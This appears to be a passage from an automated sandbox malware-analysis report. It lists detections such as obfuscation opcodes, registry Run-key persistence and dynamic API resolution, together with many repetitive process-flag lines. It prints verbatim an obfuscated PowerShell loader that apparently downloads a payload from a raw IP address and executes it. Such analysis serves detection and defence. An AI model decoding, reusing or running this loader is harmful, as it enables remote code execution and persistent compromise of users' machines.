UneoRegilSndaiErodtDispemdresTol =Lnn,$MyndLRaskeSkilv W.veForbmStrauf rflGauki.azigYemehPreee TradDole.RegesEft.p Ci.lIndaiVar.tVa,e(Sume$EnheCFormo.dves Pree G.n)Spil ');$Levemulighed=$Alveolites[0];Jettes (Circumflexes 'Anbr$.addgU.trl ,taoim ebTa.ba.alclB,nk:BestS.orkk GibeM,aspJotatS yti ,uncCoa,=partNDagbe KecwUrok-,lafOwainb ejljSkrseUns.curo.t.onc B anSSvalyVands igmtM.sceJug mSoap.FascNPhyleFre,t iga..oncWHetee Cikb istCDeralkin iSporeMetanMapptF er ');Jet Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Raakolde = 1;$Fornrmet='S';$Fornrmet+='ubstrin';$Fornrmet+='g';Function Circumflexes($Cumulet){$Semimonarchically=$Cumulet.Length-$Raakolde;For($Habitually=4; $Habitually -lt $Semimonarchically; $Habitually+=(5)){$Wenzel+=$Cumulet.$Fornrmet.Invoke($Habitually, $Raakolde);}$Wenzel;}function Jettes($trendy){&($Indbagendes) ($trendy);}$Simultansceners=Circumflexes 'Ark,MMervoAn.czVampiT lel ElelBlreaSy.o/Jagt5 ve.Seac0T,sp Ryg.( KrmW.urdiRiitn s rdPi do.orhwAllosHjem G,oN PraT.oli ,eg1Inte0Remb.Spra0Anal;Duct Ret.WVagtiAtomnskyt6Aced4 Non;Falc F.glx.art6Pseu4.icr;Rovf MilrGramvNert:Nara1H,lg2Rive1Unde.Sopr0Pres)Vrd. P.slG,ndeeCubacSkinkTilloOffp/Slib2Pl r0Ned,1Appe0Onyc0Ven,1 enn0Trfi1 Bre V deFMickiKonsr traeA.trf dr oQrscxSamm/Moor1Hard2 ,or1Werf.,yde0.uto ';$Optrins45=Circumflexes 'tidsUI.prsP,yceSkabrover-StemAUkeng,ondeLivinE,tetHera ';$Levemulighed=Circumflexes 'B,slhG,ldt MentInflpKo,m:Conf/Ke,d/,ndf8Ago.7 bal.Pige1Cann2.ejl1 Fer.,rol1Diet0Nona5 Ske..ata1 Bl,6Ex.e3Kast/SrmrD Kile Ne.tSkreeIndmn rot MyxiBe aoKonknConse BoynDesi.s,rtj.attaDissv toda Non ';$Cose=Circumflexes 'Skor>Undi ';$Indbagendes=Circumflexes 'Dm,niMilieSelsx Bar ';$Nutritionary133='Paakldtes';Jettes (Circumflexes 'Ch dSSonaeAutotAlda-UnmyC.rocoValgn,annt Ende.enin S.dtO er Can- NobP ixta Fo.tBindhMe.k VrdiTSorg:Baga\Pt.rFbureoPot,rOutshTot,j S.iuretrlillesFletbTikmr GabeSmaamRadesAmoreT ivs.lbn.MargtAircx iltSaut Pote-La dVKinea Boll SafuEncaeDiap ,npr$CausN IlluDiglt Tndr,nbriKon,tBra,iUn.koDegenSpydaTricr egnyKrim1K.ip3Erem3L.eb; Bri ');Jettes (Circumflexes 'Tr.ni.inkfHoo. Skil(Indit AroeUndesuafmtEpit-DrukpFareaSkibtDuplhAfid silTRuck:None\Sla,F Sgeo Bu,rTec.hobsejAp.puQuanlBloks ostbs,mmrP osePal.mSocisCudbe Pics A,m.Te rtBre,xDigit ,fl),era{Giske andxRe aiNacrtCham}Pg.e;Ergo ');$Ballplayers248 = Circumflexes ' nkeSpikc Udmhsiego lgu Eksp%S,paaBagepTaktpOtopdElemaimpetarchaTran%She,\ParaATrignKolltHo,eiangulSkrmltr.ke Anpa JounChr,1Umed4 C.s4Sur...lumGVilkrBel.oJe n Ef e&sa,m&D.ge UpfieBil cUnnah KreoN,np Ci.i$ Kri ';Jettes (Circumflexes 'Real$,eclgFalsl.nifoAxi,bWolfaAfselCoin:SgesFScrso vrmrBrbaaBronn kkek Tabr,obbiGre nResig Kr,s oltpOveruCafenOverksol t KureBagnt Bits .ps=Abd.(dab,cSju.mEl md ,in Ferr/Calcc Ch, F rs$BedrBPi radra,lSna lurfjpMarklDialaIrr.yIndve R,trSeiss Puz2Duct4Ba.h8Phot)Dri ');Jettes (Circumflexes 'Ha.l$SlvsgEftel nfoSt,ibM.inaTabplTick: SpeA MoklEctovSubte UneoRegilSndaiErodtDispemdresTol =Lnn,$MyndLRaskeSkilv W.veForbmStrauf rflGauki.azigYemehPreee TradDole.RegesEft.p Ci.lIndaiVar.tVa,e(Sume$EnheCFormo.dves Pree G.n)Spil ');$Levemulighed=$Alveolites[0];Jettes (Circumflexes 'Anbr$.addgU.trl ,taoim ebTa.ba.alclB,nk:BestS.orkk GibeM,aspJotatS yti ,uncCoa,=partNDagbe KecwUrok-,lafOwainb ejljSkrseUns.curo.t.onc B anSSvalyVands igmtM.sceJug mSoap.FascNPhyleFre,t iga..oncWHetee Cikb istCDeralkin iSporeMetanMapptF er ');Jet Jump to behavior
Contains functionality to dynamically determine API calls
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW, 16_2_004044A4
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF848F40944 push E95B7AD0h; ret 2_2_00007FF848F409C9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF848F409F4 push E95B7AD0h; ret 2_2_00007FF848F409C9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF848F46F87 push esp; retf 2_2_00007FF848F46F88
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_049CD6EA push esp; iretd 5_2_049CD739
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_078408C2 push eax; mov dword ptr [esp], ecx 5_2_07840AC4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07840AAC push eax; mov dword ptr [esp], ecx 5_2_07840AC4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 8_2_222E2806 push ecx; ret 8_2_222E2819
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_00F67DE0 pushfd ; retf 14_2_00F67DF1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_075708C2 push eax; mov dword ptr [esp], ecx 14_2_07570AC4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_0044693D push ecx; ret 16_2_0044694D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_0044DB70 push eax; ret 16_2_0044DB84
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_0044DB70 push eax; ret 16_2_0044DBAC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_00451D54 push eax; ret 16_2_00451D61
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_0044B090 push eax; ret 19_2_0044B0A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_0044B090 push eax; ret 19_2_0044B0CC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_00451D34 push eax; ret 19_2_00451D41
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_00444E71 push ecx; ret 19_2_00444E81
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_00414060 push eax; ret 20_2_00414074
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_00414060 push eax; ret 20_2_0041409C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_00414039 push ecx; ret 20_2_00414049
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_004164EB push 0000006Ah; retf 20_2_004165C4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_00416553 push 0000006Ah; retf 20_2_004165C4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_00416555 push 0000006Ah; retf 20_2_004165C4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F41328 push eax; iretd 25_2_21F41369
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F4225F pushad ; ret 25_2_21F427F9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F44219 pushad ; retn 000Dh 25_2_21F44275
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F709AD push ecx; mov dword ptr [esp], ecx 25_2_21F709B6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F42851 push eax; iretd 25_2_21F42858

Persistence and Installation Behavior
barindex
Uses cmd line tools excessively to alter registry or file data
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe

Boot Survival
barindex
Creates multiple autostart registry keys
Source: C:\Windows\SysWOW64\clip.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DJNLOJ3PER
Source: C:\Windows\SysWOW64\reg.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bynkefugls
Source: C:\Windows\SysWOW64\reg.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Vibeka Jump to behavior
Source: C:\Windows\SysWOW64\reg.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Vibeka Jump to behavior
Source: C:\Windows\SysWOW64\reg.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Vibeka Jump to behavior
Source: C:\Windows\SysWOW64\reg.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bynkefugls
Source: C:\Windows\SysWOW64\reg.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bynkefugls
Source: C:\Windows\SysWOW64\clip.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DJNLOJ3PER
Source: C:\Windows\SysWOW64\clip.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DJNLOJ3PER
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 19_2_004047CB
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Program Files (x86)\Windows Mail\wab.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
